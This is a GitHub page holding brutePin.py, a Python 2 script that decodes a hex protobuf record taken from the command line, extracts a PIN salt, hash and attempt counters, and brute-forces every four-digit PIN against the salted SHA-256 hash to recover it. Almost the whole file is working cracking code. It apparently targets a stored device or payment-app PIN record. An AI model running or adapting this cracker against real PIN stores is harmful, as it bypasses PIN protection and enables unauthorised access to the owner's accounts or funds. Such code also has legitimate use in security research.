-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathbrutePin.py
executable file
·98 lines (85 loc) · 2.47 KB
/
brutePin.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/python
import binascii
import sys
import hashlib
import struct
TYPE_VARINT = 0
TYPE_64 = 1
TYPE_LENGTHDELIM = 2
TYPE_STARTGROUP = 3
TYPE_ENDGROUP = 4
TYPE_32 = 5
def getVarintPos(stream):
result = 0
shifts = 0
pos = 1
for i in stream:
result = result | ((ord(i)&0x7f) << shifts)
if not (ord(i)&0x80):
return result,pos
shifts = shifts+7
pos = pos+1
def getLengthdelimPos(stream):
length,pos = getVarintPos(stream)
stream = stream[pos:]
string = stream[0:length]
return string,pos+length
def getTagType(i):
return (i>>3,i&0x07)
def getTypeName(i):
if i == TYPE_VARINT:
return "varint"
elif i == TYPE_64:
return "64 bit"
elif i == TYPE_LENGTHDELIM:
return "length delim"
elif i == TYPE_32:
return "32 bit"
else:
return "WTF"
def genDecodeProtoBuff(protoBin):
allsGood = True
theProtos = {}
while allsGood:
if len(protoBin) == 0:
return theProtos
currentTagInt,pos = getVarintPos(protoBin)
protoBin = protoBin[pos:]
currentTag,currentType = getTagType(currentTagInt)
if currentType == TYPE_LENGTHDELIM:
data,pos = getLengthdelimPos(protoBin)
protoBin = protoBin[pos:]
theProtos[currentTag]=(currentType,data,genDecodeProtoBuff(data))
elif currentType == TYPE_VARINT:
data,pos = getVarintPos(protoBin)
protoBin = protoBin[pos:]
theProtos[currentTag]=(currentType,data,0)
else:
allsGood = False
return theProtos
proto = sys.argv[1]
protoBin = binascii.unhexlify(proto)
theData = genDecodeProtoBuff(protoBin)
pinsalt = struct.unpack("q",struct.pack("Q",theData[3][2][1][1]))[0]
pinhash = theData[3][2][2][1]
pinBadAttempts = theData[3][2][3][1]
pinExpired = theData[3][2][4][1]
pinStateTransTS = theData[3][2][5][1]
pinStateTransDel = theData[3][2][6][1]
foundPin = False
testpins = ["%04d" % i for i in range(10000)]
for testpin in testpins:
testhash = hashlib.sha256(testpin+str(pinsalt)).digest()
if binascii.hexlify(testhash)==pinhash:
foundPin = True
break
print "Salt: " + str(pinsalt)
print "Hash: " + pinhash
print "Bad Attempts: " + str(pinBadAttempts)
print "Is Expired: " + str(pinExpired)
print "Trans TS: " + str(pinStateTransTS)
print "Trans Delta: " + str(pinStateTransDel)
if foundPin:
print "Pin: " + testpin
else:
print "Fuck the pin!!"